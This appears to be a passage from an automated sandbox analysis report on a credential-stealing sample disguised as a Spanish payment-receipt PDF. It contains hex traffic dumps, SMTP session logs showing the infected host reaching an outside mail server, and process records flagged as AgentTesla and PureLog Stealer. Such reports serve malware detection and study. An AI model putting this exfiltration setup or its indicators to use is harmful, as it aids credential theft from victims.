a8 93 e6 6a 62
                                                                              Data Ascii: "p,fu )B(l^L>EplW?Y_B~6V^Ad.=ffb_e@G'q7<cZ~2eNaaE<Rl,ED5:21Q+tn#$pet%~*._:B*N[pVBl\[y|;7[Gjb
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 6d 0a f4 a2 68 03 8c 1e c4 a0 48 5e 7b 38 7e d9 a3 04 88 5a 31 eb db 4c 78 66 da 33 1c 6c ec 6b 8d d5 63 13 5f 2a 9a d9 8a ef fd 8c c3 48 e5 0b b7 7e f9 42 9e 2b 9b d1 79 1c a2 76 86 06 12 e8 48 6e d1 a6 90 9a 47 70 0f 35 17 70 8b 58 f0 2f b6 a2 0d 68 c2 8e 8d 62 c5 32 c1 19 66 91 5b 57 e9 1a 4f 81 17 97 30 46 48 25 5c ff 1c 08 0b 18 86 25 b2 25 50 ed f3 e3 c9 34 2c b0 79 93 1e 1f 03 95 11 80 1c 29 44 3e 2a 21 92 6a 28 79 b0 9f ac 11 e2 79 5e 0c e3 20 0d 5b 1e 06 1e 4e bf 65 f9 54 eb 53 97 a5 7a e2 0b 6e b9 ff 01 8d 14 d6 39 3e 16 78 9d 0d d2 46 e6 43 2c 8c 2b 4a e9 c4 fd fd 9d e4 a0 0f 26 3d 4f ed d8 7a 1c 07 7f 98 c3 ea cd 26 99 de f8 ee 6c c4 84 57 8e 32 b0 fb 05 f7 5a 05 c5 d9 80 83 e7 cc 4e 75 0e 00 46 70 54 a9 94 bf d2 d3 2f fc 74 09 16 87 a6 6e 4f
                                                                              Data Ascii: mhH^{8~Z1Lxf3lkc_*H~B+yvHnGp5pX/hb2f[WO0FH%\%%P4,y)D>*!j(yy^ [NeTSzn9>xFC,+J&=Oz&lW2ZNuFpT/tnO
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 13 c1 3f 19 67 77 40 79 a5 df 95 1e ec 0a 13 b0 13 06 ba d2 48 7a c1 bf 22 ae 3c f7 35 30 93 a0 ea f1 c8 13 d1 20 77 68 bd d4 c6 b3 c4 6f 7d d2 78 2b 24 4b 63 5f 2c ad c2 2f ec da fc 40 4d 6a 23 d4 cf 7f ce b3 38 04 02 f3 82 72 f3 fe 22 3d 86 1c 50 9f 0a 4b 9e c8 4e d3 5a 69 7c f5 18 5f 49 4b 53 e6 d7 d6 c4 ad 4e d1 c1 a6 d8 5b 5a b1 44 99 85 a1 2b c1 b7 49 5d aa 8b 26 48 68 5c cd af 65 83 fc 6f 9c 63 b0 3d 5c 4e 8a 3d 81 8e 79 94 16 4d 3f 47 f3 cc ea 8a a0 87 5d 00 0c 73 3c bf c3 be ab dc c3 e1 e5 69 9a 88 f3 37 dc 35 73 68 64 e2 6d d1 10 8e 05 54 ea 34 e2 7f f5 3f fc b2 53 ea 1d b2 43 fb 2c 10 2b 3e 93 cf ee 66 ed 6f ba 17 04 6b 25 50 8d be 9e e7 83 0b fa e8 97 1b da 9d 64 48 1b a5 37 e0 82 72 25 7e 35 90 60 ee 04 c8 81 9a d6 a2 a1 81 96 23 64 d9 19 1a
                                                                              Data Ascii: ?gw@yHz"<50 who}x+$Kc_,/@Mj#8r"=PKNZi|_IKSN[ZD+I]&Hh\eoc=\N=yM?G]s<i75shdmT4?SC,+>fok%PdH7r%~5`#d
                                                                              2024-02-21 20:09:31 UTC16384INData Raw: 90 37 f4 80 32 5f 8a 18 10 af ef ba cf 07 fc 5e ef 04 2e 6a 0a 7f 64 9c a4 32 f2 4f 57 a5 fc e5 7b 24 cd 30 a5 90 90 ea f1 43 fc 2a 1d f0 2b 34 da 4e 53 8b fd f9 03 89 a9 93 54 e8 26 d3 ad a6 e6 27 d9 42 f9 5a 69 cf 4f 1d 07 7e af 92 bb 27 6e 08 a8 b6 d0 ea 4c 6c f3 66 e4 83 51 48 e3 5a af 67 ac b9 72 e8 9a 2f f1 a2 20 d6 7c 96 bf 50 b5 4e 73 8b 20 c5 77 4d c3 a7 f8 dd ad 73 95 d2 5e 18 2a e9 6d 0b 4e 2c bd 1b b8 fa bd f8 23 a5 19 1f e6 b3 85 f1 8b 48 49 7c 7c 2b 81 fe bb 9f 5a 12 6d b2 ad 75 f4 bd 88 d1 c1 e5 97 25 60 1f 4a 01 17 ac 36 4a d1 85 b3 bd e8 14 8f 17 e9 5e b1 be 9e 38 9c 09 a6 80 33 ed 52 a7 58 a0 46 55 b1 47 49 3a 4f 53 02 50 e1 74 19 94 c5 05 65 a6 e1 4d 76 b5 21 e4 55 c1 a7 f5 5c 8f d6 61 c4 fe e7 18 51 eb 9d c3 b3 35 4f 5b 35 fb 05 3a 34
                                                                              Data Ascii: 72_^.jd2OW{$0C*+4NST&'BZiO~'nLlfQHZgr/ |PNs wMs^*mN,#HI||+Zmu%`J6J^83RXFUGI:OSPteMv!U\aQ5O[5:4


                                                                              SMTP Packets

                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                              Feb 21, 2024 21:08:54.681421041 CET58749708191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:08:54 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:08:54.681838036 CET49708587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:08:54.888376951 CET58749708191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:08:54.888714075 CET49708587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:08:55.087846041 CET58749708191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:08:58.227288008 CET58749709191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:08:58 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:08:58.227473974 CET49709587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:08:58.424025059 CET58749709191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:08:58.424221992 CET49709587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:08:58.625976086 CET58749709191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:09.247705936 CET58749720191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:09 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:09.248199940 CET49720587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:09.453123093 CET58749720191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:09.453357935 CET49720587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:09.652488947 CET58749720191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:12.959785938 CET58749721191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:12 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:12.960318089 CET49721587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:13.160278082 CET58749721191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:13.160499096 CET49721587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:13.358985901 CET58749721191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:16.020622969 CET58749725191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:15 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:16.020876884 CET49725587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:16.217204094 CET58749725191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:16.217443943 CET49725587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:16.415726900 CET58749725191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:19.486104965 CET58749726191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:19 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:19.488898993 CET49726587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:19.687505960 CET58749726191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:19.700314999 CET49726587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:19.902008057 CET58749726191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:25.554183006 CET58749730191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:25 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:25.554470062 CET49730587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:25.755125999 CET58749730191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:25.756803989 CET49730587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:25.957879066 CET58749730191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:28.907258034 CET58749731191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:28 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:28.907392979 CET49731587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:29.105324030 CET58749731191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:29.105583906 CET49731587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:29.306200981 CET58749731191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:33.629554987 CET58749735191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:33 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:33.629923105 CET49735587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:33.826782942 CET58749735191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:33.829037905 CET49735587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:34.027642012 CET58749735191.252.141.106192.168.2.5220 TLS go ahead
                                                                              Feb 21, 2024 21:09:37.145499945 CET58749736191.252.141.106192.168.2.5220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:37 -0300
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Feb 21, 2024 21:09:37.145700932 CET49736587192.168.2.5191.252.141.106EHLO 405464
                                                                              Feb 21, 2024 21:09:37.342232943 CET58749736191.252.141.106192.168.2.5250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-PIPE_CONNECT
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-STARTTLS
                                                                              250 HELP
                                                                              Feb 21, 2024 21:09:37.418860912 CET49736587192.168.2.5191.252.141.106STARTTLS
                                                                              Feb 21, 2024 21:09:37.616910934 CET58749736191.252.141.106192.168.2.5220 TLS go ahead

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:21:08:46
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Imagebase:0xc50000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1995757334.0000000006780000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1994246590.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:21:08:49
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Imagebase:0xad0000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3214735733.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3214735733.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:3
                                                                              Start time:21:09:01
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Reramvw.exe"
                                                                              Imagebase:0x850000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2156621801.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2156621801.0000000003CD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Reramvw.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 34%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:21:09:05
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Imagebase:0x110000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:21:09:05
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Imagebase:0xf40000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2331974047.000000000334A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2331974047.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:21:09:11
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                                                                              Imagebase:0x5c0000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2237006260.0000000003BC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2237006260.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 34%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:21:09:13
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Imagebase:0xc30000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3213952954.000000000311A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3213952954.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3213952954.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:9
                                                                              Start time:21:09:19
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Reramvw.exe"
                                                                              Imagebase:0x30000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2334210822.00000000037C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2334210822.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
